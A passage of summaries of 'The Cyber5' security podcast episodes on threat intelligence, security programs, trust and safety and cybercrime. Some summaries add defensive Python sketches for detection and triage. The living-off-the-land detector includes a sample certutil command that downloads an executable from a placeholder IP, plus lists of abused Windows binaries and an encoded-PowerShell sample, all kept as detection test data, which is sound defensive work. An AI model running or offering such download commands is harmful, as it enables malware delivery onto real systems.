financial institutions to address.
In episode 52 of The Cyber5, we are joined by Nisos Managing and Technical Principals Robert Volkert and Travis Peska, who lead operations within the Pandion Intelligence team. We talk about the evolution of Nisos over the past six years, including how we now position ourselves within the private sector threat intelligence market under our new Chief Executive Officer, David Etue. Our managed intelligence mission combines open-source intelligence analysis, technical cyber security investigative tradecraft, and data engineering to solve enterprise threats around cyber security, trust and safety platforms, reputation, fraud, third party risk, and executive protection. We reminisce about our favorite investigations and talk about what's next for Nisos. Three Topics Covered in this Episode: How Nisos Has Evolved In the last six years, Nisos evolved its mission to focus on being the Managed Intelligence Company™. Using skill sets combining offensive operators, forensic and network analysts, open source intelligence experts, and data engineers, we collect and analyze data to solve problems within six primary intelligence domains: Cyber Threat Intelligence Protective Intelligence Reputation Intelligence Platform Intelligence Fraud Intelligence Third Party Intelligence Providing the Answers, Not Just Data, in Monitoring and RFI Services Through our “outside the firewall” investigations and tradecraft over the years, we realized that customizing smaller datasets around customer problems is more helpful to customers and differentiates our offering with actionable intelligence and appropriate context. Aggregating data into a product that doesn't provide answers is often a waste of resources for organizations that need to make information actionable for security operations teams and executives. As part of these services, routine monitoring followed by an aggressive RFI service is generally viewed as the most effective way to answer customer intelligence requirements within a 24-48 hour period. Favorite Investigations Over the Last Six Years While the most prolific investigations have involved the unmasking of threat actors when the appropriate context is needed, the most well-known investigations generally involve attributing attacker infrastructure and unraveling different malicious tool sets used against platform technology companies and business applications.
In episode 51 of The Cyber5, we are joined by Chris Castaldo. Chris is the Chief Information Security Officer for Crossbeam and has been CISO for a number of emerging technology companies. In this episode, we talk about his newly released book, “Start-Up Secure,” and how growth companies can implement security at different funding stages. He also talks about the reasons security professionals should want to be a startup CISO at a growing technology company and how success can be defined as a first-time CISO. We also talk about how startup companies can avoid ransomware events in a landscape that is not only constantly changing but also gives little advantage to defenders of small and medium sized enterprises. Two Topics Covered in this Episode: 4 Security Lessons for Founders of Start-up Technology Companies When a B2B company is pre-seed or before Series A funding, customers might give it leeway for lax cybersecurity controls. However, after an A round, policies, certifications (SOC 2 or ISO 27001), and procedures will be required to ensure customer data stays safe. A B2C technology company might not be asked by the public for certifications, but auditors and regulators may ask. Basic policies include: Single sign-on (such as Okta) for authentication into applications, cloud, and workstations Password management implementation (such as LastPass or 1Password) Encryption at rest and in transit Vulnerability scanning Combating Ransomware from The Inside-Out Approach and Integrating Threat Intelligence Blocking and tackling from the inside out to get in front of ransomware is challenging. The simple items to tackle are the following: Auto-updates for patch management on operating systems Endpoint Detection and Response products Proper asset management to have full visibility of all network devices and services At the point when resilience and compliance controls are in place and an organization can bounce back from an incident in a timely manner, adversary insight via threat intelligence is a logical next step.
In episode 50 of The Cyber5, we are joined by Paul Kurtz. Paul's career includes serving as Director of Counter-Terrorism, Senior Director for Cyber Security, and Special Assistant to the President of the United States for Critical Infrastructure Protection. He was previously the CEO of the threat intelligence platform TruSTAR and is now the Chief Cybersecurity Advisor, Public Sector at Splunk. In this episode, we discuss the Biden Administration's executive order for cybersecurity and how it impacts the public and private sector in relation to intelligence management. We also talk about an inside-out network approach and the criticality of cloud migration in detecting cyber threats at scale. We further discuss the value of threat intelligence and the importance of integration with enterprise systems. 6 Topics Covered in this Episode: Three Key Points of the Executive Order: While important topics such as zero trust identity access management and third party risk management get the major attention, three important, but often overlooked, points covered in the executive order are cloud transition, information sharing, and data collection and preservation. From an intelligence management and security perspective, the migration of the US public sector to the cloud, coupled with information sharing and data preservation, is the most important action to reduce mean time to detect and alert, mean time to respond, and mean time to remediate. Need for Automation of Internal and External Telemetry: Endpoint Detection and Response, next generation anti-virus, next generation firewalls, and IAM (identity and access management) are examples of the advancement in enterprise security solutions. These technologies are now being augmented by threat intelligence solutions. Integrating and automating this suite of advanced capabilities is key to optimizing intelligence and defending against increasingly sophisticated threat actors. MSSPs are Critical to Protecting SMBs: MSSPs must integrate their alerting and detection ability with the cloud in order to protect small and medium sized businesses. Small and medium sized businesses don't typically have the security teams or expertise to patch, remediate, and threat hunt. MSSPs with MDR capability can effectively serve this market. Threat Intelligence Must Be Integrated to Augment Existing Telemetry: Threat intelligence must be actionable. A key step toward actionability is integration into an internal ticketing system, a Security Information and Event Management (SIEM) tool, a Threat Intelligence Platform, or an Endpoint Detection and Response solution (a minimal sketch of such an integration follows this summary). Behavior is King for Appropriate Context: Appropriate context requires the ability to detect malicious behavior from actors inside a network and initiate an appropriate response. This is not possible without the context provided by cloud integration, log aggregation, a retrospective "look back" capability, and the integration of external data and internal telemetry. US Civilian Agencies Need a Roadmap for Cloud Integration: If the Central Intelligence Agency can embrace the cloud, so can other agencies. A federal roadmap is urgently needed to defend against attacks by sophisticated adversaries.
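To make the integration point concrete, here is a minimal Python sketch of pushing an enriched threat-intelligence match into an internal ticketing system so it enters the normal response workflow. The endpoint URL, token, and field names are hypothetical placeholders, not any specific product's API.

```python
# Minimal sketch (hypothetical ticketing API): turn a threat-intel match into a ticket.
import json
import urllib.request

TICKETING_URL = "https://tickets.example.internal/api/v2/issues"  # hypothetical endpoint
API_TOKEN = "REPLACE_ME"                                           # hypothetical credential

def build_ticket(indicator: str, context: str, severity: str = "high") -> dict:
    """Shape a threat-intel match into the fields a ticketing system typically expects."""
    return {
        "title": f"Threat intel match: {indicator}",
        "description": context,  # who the actor is, why it matters, suggested action
        "severity": severity,
        "labels": ["threat-intel", "auto-generated"],
    }

def file_intel_ticket(ticket: dict) -> int:
    """POST the ticket so analysts can act on the match through their normal workflow."""
    req = urllib.request.Request(
        TICKETING_URL,
        data=json.dumps(ticket).encode("utf-8"),
        headers={"Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status  # e.g., 201 when the ticket is created

if __name__ == "__main__":
    ticket = build_ticket(
        indicator="203.0.113.7 observed in outbound netflow",
        context="IP overlaps with infrastructure reported for a known ransomware affiliate; "
                "recommend blocking at the egress firewall and reviewing related hosts.",
    )
    print(json.dumps(ticket, indent=2))  # file_intel_ticket(ticket) would send it for real
```

The design choice this illustrates is the one the episode argues for: intelligence is actionable only once it lands in a system a team already works from, rather than sitting in a feed.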
In episode 49 of The Cyber5, we are joined by Cassio Goldschmidt. Cassio is Senior Director and Chief Information Security Officer at ServiceTitan. We discuss building a security program at a late-stage tech startup, including what to prioritize when starting a security program. While tech startups have a mantra of "move fast and break things," Cassio talks about how a security program should enable the business and adapt to the culture. He also discusses the pitfalls to avoid when starting a program like this. 4 Topics Covered in this Episode: Reasons a Business Starts a Security Program: It's critical to understand why a technology company is hiring its first Chief Information Security Officer. Typically it's for one of four reasons: Compliance: If a company is in a highly regulated industry, a stronger security program is mandatory. Reputation: Security products, for example, need a reputation for safety that is core to their business model. Breach: Some companies have a breach and the board mandates a stronger security program. Customer Demand and Losing Business: Competitors use stronger security programs as a business differentiator, and oftentimes a security program gives consumers or clients peace of mind that their data is safe. Initial Priorities of a Security Program: The growth of the company is important to understand when starting a security program because security professionals need to plan for where the company will be tomorrow, not just where it is today. New security programs are the "guardians" of business initiatives, not the "gates." Key tactical aspects of a security program are: Assess Risk: Perform a risk assessment to baseline maturity as it stands today, and map out the challenges to fix items that are critical to the business, with the understanding that the business cannot stop for security initiatives. Listen: Engage different parts of the business (sales, marketing, engineering, etc.). Educate: Build a good educational program to train the workforce. Common Pitfalls to Avoid for Initial Security Programs: Common pitfalls a CISO is likely to face when starting a security program include: misconfigurations; poor patch management; abuse problems (spam); not centralizing spearphishing emails; no security education for the workforce; credentials exposed in the wild; weak password policies; poor onboarding/offboarding policies that allow old accounts to remain active and exposed to the internet; and prioritizing nation-state lateral movement or zero-day vulnerabilities when smaller issues can be solved first. Enabling Business: "Move Fast But Don't Break Things": When setting up security programs, security professionals should adopt the mantra of "move fast but don't break things." They need to implement their program and remediations, but they must keep constant availability as one of the highest priorities. Other items like red team (penetration testing), blue team (threat hunting), and threat intelligence should initially be outsourced, once the first remediations from a risk assessment are complete. Security professionals should spend department budget money like it is their own personal money, not the company's money. Understanding what the technologies will do for the program and having a way to show success metrics are important to justifying the spend. Dynamic application analysis tools are important for technology companies as these ideally protect the main business technology applications.
Topic: Using Intelligence Analysis in InfoSec: Think Globally and Act Locally In episode 48 of The Cyber5, we are joined by Rick Doten. Rick is VP of Information Security at Centene Corporation and consults as CISO for Carolina Complete Health. We discuss shifting the operating model of threat hunting and intelligence to a more collaborative model: "think globally and act locally." We then dive deep into the intelligence analysis used to collect and analyze the vast array of network data and prioritize network protection. Finally, Rick makes an argument for outsourcing an intelligence function as a viable model. 5 Topics Covered in this Episode: Security Operations Integrating with Cloud, Applications, and Mobile: (01:00 - 06:00) Security operations involve integration with key elements of the business such as the cloud, applications, and mobile teams. Risks to a container are much different from risks to a server and force security operations to integrate with many teams, especially in large enterprises. This will guide how we protect proactively with alerting and reactively with incident response. Using Intelligence Analysis with Information Security Data Collection: (06:00 - 08:52) Intelligence includes tracking specific campaigns of threat actors, their intentions, and their capabilities. Intelligence analysis in the disciplines of information security is linking the human to the malicious act. For example, suppose a criminal threat actor uses email phishing and credential harvesting. In that case, the data collection model and instrumentation will be different than when looking at actors who use exposed RDP or take advantage of supply chain risks. It will also be very different from a nation-state actor who is known to go "low and slow" and persist in 10 different places in a network. Value of Attribution and Communicating to the Board of Directors: (08:52 - 13:26) The mindset of keeping the confidentiality, integrity, and availability of information safe without attributing threat actors and building appropriate threat models is becoming antiquated. Understanding the human who perpetrated the act is critical; their job is to break into a network and collect and/or monetize data. Information sharing used to be easier in the defense industrial base because there are cleared environments for it; however, it is becoming more efficient elsewhere with Information Sharing and Analysis Centers (ISACs). Boards of Directors understand competitors stealing intellectual property, so framing cyber threats in the same vein is the most productive way to get them to understand the importance of nation-state espionage or cyber criminals. The Right Way to Do Threat Intelligence: Think Globally, Act Locally: (13:26 - 24:00) The most important threat intelligence is internal network telemetry. The wrong mentality is to buy threat intelligence feeds and load indicators of compromise (IOCs) into a security tool like a SIEM. This will result in tremendous workloads with little result, as threat actors change their signatures constantly. Instead, it's important to get timely, actionable, and relevant finished intelligence on actors and their campaigns, not raw data or information. Finished intelligence might be reviewing the technical methodologies of Russian GRU (or REvil ransomware) actors and identifying behaviors that can be detected internally on the network (a minimal sketch of this behavior-focused detection follows this episode summary). At the highest level, attack campaigns involve assigning individuals to attack one particular company and steal or monetize something very specific.
After gaining this intelligence, a security team can "dogpile" with the different entities of the business (SOC, applications, IT, development, mobile, etc.) to hunt and defend: "think globally, act locally." Threat intelligence could certainly be outsourced, especially for companies that do not belong to an industry with ISACs. The Hardest Part of Intelligence Analysis: Determining Targeted Attack Versus Commodity: (24:00 - 31:00) The hardest part of intelligence is being able to quickly identify whether an attack is targeted or commodity. An actor who persists on Active Directory and the domain controllers is much different from one who wants to exploit a bug in a cloud or mobile application. The ability to quickly detect these differences, with minimal visibility gaps in internal network telemetry, is what separates mature security teams from less mature ones.
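To make the "act locally" point concrete, the following is a minimal Python sketch of behavior-based detection over process-creation events rather than IOC matching. The event field names (parent, image, command_line), the suspicious parent/child pairs, and the encoded-PowerShell check are illustrative assumptions, not Rick's methodology or any specific product's schema.

```python
# Minimal sketch: flag attacker-like behavior in process-creation events
# (assumed to be exported from a SIEM as dictionaries) instead of matching IOC lists.
import re

SUSPICIOUS_PARENT_CHILD = {
    ("winword.exe", "powershell.exe"),   # Office spawning PowerShell
    ("excel.exe", "cmd.exe"),
    ("outlook.exe", "wscript.exe"),
}
ENCODED_PS = re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)

def score_event(event: dict) -> list:
    """Return reasons an event looks like attacker behavior rather than a known IOC."""
    reasons = []
    pair = (event.get("parent", "").lower(), event.get("image", "").lower())
    if pair in SUSPICIOUS_PARENT_CHILD:
        reasons.append(f"unusual parent/child: {pair[0]} -> {pair[1]}")
    if ENCODED_PS.search(event.get("command_line", "")):
        reasons.append("base64-encoded PowerShell command line")
    return reasons

if __name__ == "__main__":
    sample = {
        "parent": "WINWORD.EXE",
        "image": "powershell.exe",
        "command_line": "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    }
    for reason in score_event(sample):
        print("ALERT:", reason)
```

The behaviors stay stable across campaigns even when infrastructure and file hashes rotate, which is the episode's argument against loading raw IOC feeds into a SIEM.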
In episode 47 of The Cyber5, we are joined by Lena Smart. Lena is the Chief Information Security Officer at MongoDB. We discuss how security can be an enabler of a business during fast periods of growth. We review how different departments can set up their own applications without needing an arduous approval process. We also discuss the different cultures across departments and best practices for assessing vendor risk. 4 Topics Covered in this Episode: Avoiding Shadow IT and Enabling the Business: (01:47 - 06:00) In big organizations, "shadow IT" refers to information technology systems deployed by departments other than the central IT department. Individuals add these technologies to work around the shortcomings or limitations of the central information systems. Oftentimes IT security is not aware of the implementation of these systems until vulnerabilities are exploited and security is called in to investigate the incident or breach. Security can enable the business through education and automation of processes. Communication is key to success. We recommend regular meetings with legal, human resources, technology, engineering, sales, and marketing. A "security champions program" is also helpful because it brings together those who are interested in security and shows transparency around the risks security faces: incidents, vulnerabilities, patch management cycles, etc. Transparency of Reporting Incidents Back to Stakeholders: (06:00 - 08:37) Great security programs start with the CEO and board of a company. If they recognize these issues as existential threats to the business, it's easier to gain insights and selective transparency, as needed. While a "see something, say something" approach is highly advised, it's more important to have a feedback cycle so closure is brought to the employees outside of security who report incidents. Security acting as a "black box," where information comes in and nothing gets returned, is not going to keep employees reporting the issues that matter. Security Adapting to the Cultures of Departments: (08:37 - 12:31) Security teams cannot be seen as the "people that say no." Security teams cannot live with a reputation of fostering fear, uncertainty, and doubt (FUD) within the business. Bringing people who are interested in security together for two hours a week for events like capture the flag, a security book club, and tabletop exercises helps increase awareness and produces tangible results, including business buy-in for security programs and a reduction in shadow IT. Critical Elements of Third Party Risk Management: (12:31 - 17:00) Performing security checks when new vendors onboard, and going beyond questionnaires, is critical now more than ever following SolarWinds. A particular focus should be categorizing the high-risk vendors that could be used as a pivot point for gaining access to your organization. Lena recommends using subject matter experts to map out connections from high-risk vendors with an investigative mindset, not just a compliance box-checking exercise. This is likely a year-long effort, not a one-month one. The result of such a deep dive should be a process for engaging with critical vendors when a supply chain attack occurs, rather than simply considering terminating the relationship.
In episode 46 of The Cyber5, we are joined by Charlotte Willner. Charlotte is the Executive Director of the Trust and Safety Professional Association. We define what trust and safety means within organizations and how it differs from traditional cyber and physical security. We focus on fraud and abuse of user-generated content on the platforms and marketplaces of technology companies. Finally, we discuss how security professionals can grow a career in trust and safety. 5 Topics Covered in this Episode: Defining Trust and Safety: (02:20 - 04:30) Trust and safety emerged from different disciplines within technology companies, including security and customer support. The security teams focused on how people were using the platforms for fraud or illicit financial gain. Customer support dealt with abuse by users and the posting of inappropriate content (e.g., illegal narcotics or child sexual exploitation). In the last 15-20 years, these two disciplines have converged to form the core of the trust and safety mission. The Differences Between Fraud and Abuse of Consumer User-Generated Content, such as Disinformation: (04:30 - 09:17) Fraud and abuse of user-generated content overlap considerably within trust and safety teams. Bad actors routinely use technology platforms to defraud individual users, especially within online marketplaces that deal with real-world spaces and objects. For example, Airbnb might combat fraud in which a bad actor misrepresents listings and tries to take the engagement off-platform in order to steal money from a user. There could also be a scenario where that off-platform engagement leads to more violent criminal acts such as assault, physical theft, or carjacking. User-generated content and fraud schemes also deal with the nature of truth: someone impersonating a US military member asking for help and money is a pretty common user-generated scheme on platforms. When trust and safety teams have to pivot into addressing user-generated content that deals with disinformation, misinformation, and even equality issues, they have to be adaptive in delivering a response that is fair and right for all. Addressing Risk Mitigation and Incident Response in Trust and Safety: (09:17 - 15:30) When the barrier to entry is minimal or non-existent (platforms are free to use), trust and safety teams deal with thousands of problems a day, and prioritization is critical. Compared to other industries (finance, retail, manufacturing), the principles are the same: 1) evaluate the quality of inputs, meaning evaluate the sources and access, and 2) align with business principles and corporate values. These principles have become more focused due to the need to moderate content in a way that is equitable for all socioeconomic and political classes. Metrics for Trust and Safety: (15:30 - 17:00) Prevalence metrics are the gold standard in trust and safety. Once a threat is identified, it is important to build automations that measure how much of that threat exists on the platform and could affect it. The caveat is that if you can't find the exact number of threatening events, you can approximate it with simple search functions to drive a program and mitigations (a sketch of such an approximation follows this episode summary). Building a Career in Trust and Safety: (17:00 - 21:00) The same principles of intelligence analysis are important for trust and safety. A sense of curiosity, integrity, and adaptability are critical skill sets, as no two days or problems will be the same.
Entry-level positions are often content moderators, who advance through fraud or customer support roles and eventually rise into more senior positions that deal directly with threat actors to make them stop, including working with law enforcement. Specialized investigations, tool development, or leadership in trust and safety are common professional development paths.
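As a rough illustration of the prevalence approximation mentioned above, here is a minimal Python sketch that runs simple keyword searches over a random sample of content and extrapolates a rate. The keyword list, toy corpus, and function names are hypothetical; a real program would tune the search terms and sample size to the platform.

```python
# Minimal sketch: approximate a prevalence metric by sampling content and
# applying a simple keyword search, then extrapolating the hit rate.
import random

SCAM_KEYWORDS = ("wire transfer", "western union", "deployed overseas", "gift card")

def looks_like_scam(text: str) -> bool:
    lowered = text.lower()
    return any(keyword in lowered for keyword in SCAM_KEYWORDS)

def estimate_prevalence(all_content_ids: list, fetch_text, sample_size: int = 1000) -> float:
    """Estimate the fraction of platform content matching a threat pattern."""
    sample = random.sample(all_content_ids, min(sample_size, len(all_content_ids)))
    hits = sum(1 for content_id in sample if looks_like_scam(fetch_text(content_id)))
    return hits / len(sample)

if __name__ == "__main__":
    # Toy corpus standing in for platform content; fetch_text would normally query a datastore.
    corpus = {
        1: "Selling a barely used bike, pickup only.",
        2: "I am deployed overseas and need a wire transfer to come home.",
        3: "Great apartment, message me for photos.",
    }
    rate = estimate_prevalence(list(corpus), corpus.get, sample_size=3)
    print(f"Estimated prevalence: {rate:.1%} of sampled content")
```

Even a crude estimate like this can drive prioritization and show whether mitigations are reducing how much of a given threat users encounter.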
In episode 45 of The Cyber5, we are joined by John Grim. John is the head of research, development, and innovation for Verizon's Threat Research Advisory Center. In this episode, we discuss the differences between threat actors who engage in cybercrime and those who are nation state espionage actors. We explore their motivations around computer network exploitation and how threat models for these actors need to adapt to enterprise security and IT. 5 Topics Covered in this Episode: 1. Motivations of Cyber Crime versus Espionage Actors: (01:30 - 08:00) According to a study conducted by Verizon in late 2020 covering a seven-year period, financially motivated threat actors were responsible for 76% of breaches, whereas espionage actors were responsible for 18% of breaches. PCI attacks, business email compromise, and fraud (such as COVID-19 scams) were more prevalent than advanced attacks. Of the 18% of breaches perpetrated by espionage actors, manufacturing, mining, utilities, and the public sector were targeted 57% of the time, making them the industries most affected by espionage threat actors. Financial, insurance, retail, and healthcare, however, are mostly targeted by financially motivated organized crime actors. The vectors most used by either type of actor (nation state or criminal) were social engineering attacks through phishing and credential theft, as well as backdoor access through applications. A big difference, however, is that in most espionage cases, native Windows command techniques, known as "living off the land" (LotL), were used to avoid detection in log entries. These techniques abuse pre-installed system tools to spread malware. 2. Defending Against Cyber Crime and Espionage for the CISO: Understanding the Environment and Threat Modeling: (08:00 - 12:16) The number one discovery method for breaches, according to Verizon, was investigating suspicious traffic. A two-part, multi-step strategy should be implemented to protect crown jewels and alert on suspicious traffic. The first part is understanding your own environment: 1) identify critical data and the assets that hold that data, 2) ensure network devices are configured and patched properly, and 3) restrict access. Defenders need the proper tooling to flag anomalies in suspicious traffic, especially when so much of it could be native Windows commands (LotL) in the environment (a detection sketch follows this episode summary). The second part of this strategy is conducting threat modeling against the threat actors that are likely to attack your environment and leveraging intelligence sources to build proper defenses and controls. 3. Evolution of Threat Intelligence Driving Investigations: (12:16 - 15:30) In the last five years, threat intel has evolved. In the early days of threat intelligence, forensic artifacts (known as indicators of compromise) were shared to tip off network defenders to known signatures of an attacker present in an organization's environment. Next, tactics, techniques, and procedures observed outside of an organization's environment began to be actively shared to give context on the attackers' modus operandi. Now, dark web and open source threat hunters go outside the wire to gather information that could be used in a breach. Intel effectively drives the investigation that prevents an incident from becoming a breach. 4. Threat Models Differ Between Cyber Crime and Espionage but Are Similar: (18:47 - 21:00) In espionage attacks, desktops, laptops, and mobile phones are the assets targeted most often.
For financially motivated attackers, the assets targeted vary tremendously, including web application servers, customers, customer devices, and the employee devices previously mentioned. To compromise the integrity of data systems, targeting software installations (such as the SolarWinds third-party compromise) was the number one technique of both financial and espionage actors. Secure configurations of software, hardware, applications, and network devices are the most important remediation efforts. 5. Embracing Business Terms Important to CEOs and Executive Leaders: (21:00 - 26:00) Security leaders need to write reports and convey technical findings in terms of risk to the business's ability to generate revenue. While data breaches have become more complex over the years, they are especially complex to stakeholders outside of security and IT, particularly HR, legal, and finance. Breaking down technical findings and threat actor capabilities so they make sense to different levels of the business is the biggest adjustment the security industry needs to make.
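To illustrate what flagging living-off-the-land activity might look like in practice, here is a minimal Python sketch, assuming process command lines have already been exported from endpoint or Windows event logs. The binary list and suspicious argument hints are illustrative assumptions, not Verizon's methodology or a complete detection.

```python
# Minimal sketch: flag suspicious use of native Windows tools (living off the land)
# in exported command lines. Lists below are illustrative, not exhaustive.
LOTL_BINARIES = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe"}
SUSPICIOUS_HINTS = ("http://", "https://", "-urlcache", "-decode", "scrobj.dll")

def flag_lotl(command_lines):
    """Yield (binary, command_line) pairs where a native tool is used in a suspicious way."""
    for line in command_lines:
        parts = line.split()
        binary = parts[0].rsplit("\\", 1)[-1].lower() if parts else ""
        if binary in LOTL_BINARIES and any(hint in line.lower() for hint in SUSPICIOUS_HINTS):
            yield binary, line

if __name__ == "__main__":
    events = [
        r"C:\Windows\System32\certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.exe",
        r"C:\Windows\System32\rundll32.exe printui.dll,PrintUIEntry",  # benign admin usage
    ]
    for binary, cmd in flag_lotl(events):
        print(f"Possible LotL abuse via {binary}: {cmd}")
```

Because these binaries are legitimate system tools, a real deployment would pair a rule like this with baselining of normal administrative usage to keep false positives manageable.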
In episode 44 of The Cyber5, we are joined by Ronald Eddings. Ron is a Security Engineer and Architect at Marqeta and host of the Hacker Valley Studio podcast; his work as a cybersecurity expert and blogger has earned him a reputation as a trusted industry leader. In this episode, we discuss the fundamentals of automating threat intelligence. We focus on the automation and analysis of forensic artifacts such as indicators of compromise and actual attacker behaviors within an environment. We also discuss metrics that matter when the objective is to show progress for a security engineering program. 5 Topics Covered in this Episode: Define the Use Cases: (01:19 - 04:17) For a mature security team, the automation of cyber threat intelligence should start with defining use cases. An enterprise should ask, "What problems am I trying to solve?" Detecting malicious binaries on devices is a good place to start. For example, let's start with a problem that plagues all organizations: phishing. Creating an inbox for reported phishing emails is a good first step. Then, an organization needs to decide whether to automate the extraction of file hashes, URLs, and IPs for analysis (a sketch of this extraction follows this episode summary) or simply to direct employees not to click on the link or open the file. Storage and Logging Components that Need to be in Place: (04:17 - 06:59) For security engineering to be effective, data must be available. Security engineers should define a data acquisition strategy by eliciting stakeholder requirements and assessing the collection plan. The right data is often spread across multiple tools and systems and must be consolidated into one location for automation to be effective. For example, if an organization wants to detect lateral movement from an Advanced Persistent Threat and is only storing a month of Windows event logs, success is unlikely. To be effective, the following logging should be in place: 1) Windows event logs, 2) netflow (which can be expensive), 3) cloud logs, 4) EDR logs from endpoint devices, and 5) VPN and RDP logs. Prioritizing MITRE ATT&CK in Security Engineering: (06:59 - 10:12) When beginning a program, security engineering should resist the temptation to start by automating detection of APT groups. Instead, they should automate alerts for the reconnaissance stages within MITRE ATT&CK and then work down the cyber kill chain towards exfiltration. Reconnaissance stages are easier to automate, and by the time an attack escalates to the lateral movement stage, automation will facilitate and speed human analysis. Security Orchestration and Automated Response (SOAR): (10:12 - 12:00) Python and Go are helpful languages to learn for the SOAR process and are useful in incident response. Useful Metrics and What Cannot be Automated in Security Engineering: (12:00 - 19:00) Mean time to detection, response, and remediation are critical metrics for security engineers to measure. Case management systems such as JIRA can facilitate interaction between the security team roles, including SOC, Incident Response, Security Engineering, Threat Hunt, Threat Intel, Vulnerability Management, Application Security, Business Units, and Red Team. Identifying new threats and understanding why a threat occurred are almost impossible to automate and will always require human analysis.
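As a rough sketch of the phishing-inbox automation described above, the Python below parses a reported email, scrapes URLs and IP addresses from the body, and hashes attachments for later enrichment. The file path, regexes, and output format are assumptions for illustration, not Ron's tooling.

```python
# Minimal sketch: pull indicators (URLs, IPs, attachment hashes) out of a reported phish.
import email
import hashlib
import re
from email import policy

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def extract_indicators(eml_path: str) -> dict:
    with open(eml_path, "rb") as fh:
        msg = email.message_from_binary_file(fh, policy=policy.default)

    urls, ips, hashes = set(), set(), set()
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        payload = part.get_payload(decode=True) or b""
        if part.get_filename():                      # attachment: hash it
            hashes.add(hashlib.sha256(payload).hexdigest())
        else:                                        # body: scrape URLs and IPs
            text = payload.decode("utf-8", errors="ignore")
            urls.update(URL_RE.findall(text))
            ips.update(IP_RE.findall(text))
    return {"urls": sorted(urls), "ips": sorted(ips), "sha256": sorted(hashes)}

if __name__ == "__main__":
    print(extract_indicators("reported_phish.eml"))  # path is a placeholder
```

The extracted indicators would then feed the analysis step the episode describes, for example enrichment against intelligence sources or automatic blocking, rather than being read manually from each reported email.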
In episode 43 of The Cyber5, we are joined by Steve Brown, Director of Cyber & Intelligence Solutions for Europe at Mastercard. Steve discusses the key aspects of cyber defense learned while working international cyber crime investigations with the United Kingdom's National Crime Agency. He discusses the proven approach of prevent, protect, prepare, and pursue. We also discuss the role Mastercard is taking in fighting cyber criminals, key aspects of adversary attribution, and how the public and private sectors can forge better partnerships to combat cyber crime. 5 Topics Covered in this Episode: 1. The Four P Approach: Prevent, Protect, Prepare, and Pursue: (01:59 - 06:08) Cyber criminals are not siloed. They coordinate on what is working and adjust quickly to take advantage of new vulnerabilities. To combat their adaptive approach, enterprises must have an equally collaborative model. Prevent: Mastercard is working with charities, non-profits, research centers, and universities to encourage individuals with technical backgrounds to pursue a career outside of cyber crime. Protect: Providing customers of Mastercard with the right knowledge and intelligence to proactively protect themselves. Prepare: Complementing playbooks with red teaming and resilience for Mastercard and its customers to ensure business continuity when an attack occurs. Pursue: It's not just about arrests; it's about Mastercard providing intelligence on infrastructure takedowns, victim engagement, and witness testimony. 2. Mastercard's Cyber Security Strategy: Pioneering the Security of the Digital Ecosystem: (06:08 - 09:57) Mastercard's cybersecurity strategy is about securing the entire digital ecosystem, both within and external to the perimeter. They want to be actively involved in the cybersecurity community and prioritize technologies that better define authentication across payment systems, identify anomalies that indicate compromised data and fraud, and improve standards and best practices. In November 2020, they launched Mastercard Cyber Secure, a unique AI-based technology that better addresses account data compromise events through identification and notification. In practice, victims are generally notified only after the initial intrusion, and by then cyber criminals are using the compromised data to facilitate other crimes, including fraud, human trafficking, and espionage. Using risk assessment technology, Mastercard identifies, assesses, and prioritizes those vulnerabilities for Mastercard acquirers around the world. This is particularly critical for the small business community. 3. Mastercard's Role in Third Party Risk Management: (09:57 - 11:43) A critical part of securing the external perimeter is understanding third party suppliers. Mastercard's acquisition of RiskRecon is a testament to their dedication and diligence around third party vulnerabilities. 4. Know Your Adversary: Attribution is an Aspect of Resilience: (11:43 - 20:45) Attribution must be a critical part of enterprise cybersecurity strategy. Proper attribution can be a major source of resilience when responding to a cyber attack. Understanding infrastructure, personalities, actor groups, and TTPs informs proper controls and response strategy. Data collected by enterprises is critical to fighting cyber crime, and enterprises must facilitate ways to legally process and share data and experiences.
Enterprises must be able to gain information and attribution on cyber crime and espionage efforts without relying on the assistance of government organizations. Demonstrating the ability to scale security operations and recover from a cyber attack is of critical concern to boards, investors, and shareholders. 5. The Private Sector's Increasing Role in Preventing Cyber Crime: (20:45 - 26:00) The private sector must increase collaboration with the public sector. While this is happening at the tactical, strategic, and inter- and intra-governmental levels, it is still not happening at the speed and scale necessary to be effective. The National Cyber Security Centre in the UK and the National Cyber Forensics and Training Alliance (NCFTA) are two organizations that bring together cybersecurity practices and investigative techniques.
In episode 42 of The Cyber5, we are joined by A.J. Nash, Senior Director of Cyber Intelligence Strategy at Anomali. A.J. discusses the steps and key components of building an enterprise intelligence program. Among the topics covered are frameworks, roles and responsibilities, critical skill sets, and metrics. 5 Topics Covered in this Episode: 1. Defining the Requirements with Key Stakeholders: Defining the intelligence requirements necessary to ensure the success of business stakeholders should always be step one. Sales, marketing, engineering, customer success, information technology, legal, and human resources will have different requirements. The security or intelligence team must prioritize the requirements in the context of what is best for the business and what meets the needs of the stakeholders. 2. Security and Intelligence Should Be Viewed as a Business Enabler: Regardless of industry or company size, the second key to success is committing that the security and intelligence team will be an enabler of the business and not a cost center. As a result of the nature of its business, the many regulations it faces, and the assets it holds, the financial industry has led the way in building intelligence programs. Other industries are following its lead as criminals branch out to target a wider range of digital assets and PII. 3. An Inquisitive Mindset is Critical When Building Intelligence Programs: The ability to view disparate pieces of information with an inquisitive mind, and then communicate business risk, is a critical skill set. Businesses often look for a combination of public sector and private sector intelligence experience when building an intelligence program. While enterprises often start by hiring a technical leader, a key to success is building a team of individuals with inquisitive minds. For example, former journalists have been known to become fantastic enterprise intelligence experts. 4. Risk Must Be Prioritized: An intelligence program is no different than any other enterprise program. Profit and risk must always be considered, and intelligence should be driving security requirements to enable the business. An intelligence program should identify adversarial intentions and capabilities, estimate the risk and cost of a successful attack, and consider the costs of the controls that need to be implemented to defend against such adversaries. This must be properly communicated to the CEO, who ultimately owns key decisions. Intelligence programs span fraud, information security, physical security, executive protection, trust and safety, third party risk, and mergers and acquisitions. 5. Important Metrics for an Intelligence Program: Mature programs build and provide key metrics based upon intelligence requirements. Metrics should focus on the actions that were taken, the intelligence that was analyzed, the subsequent controls 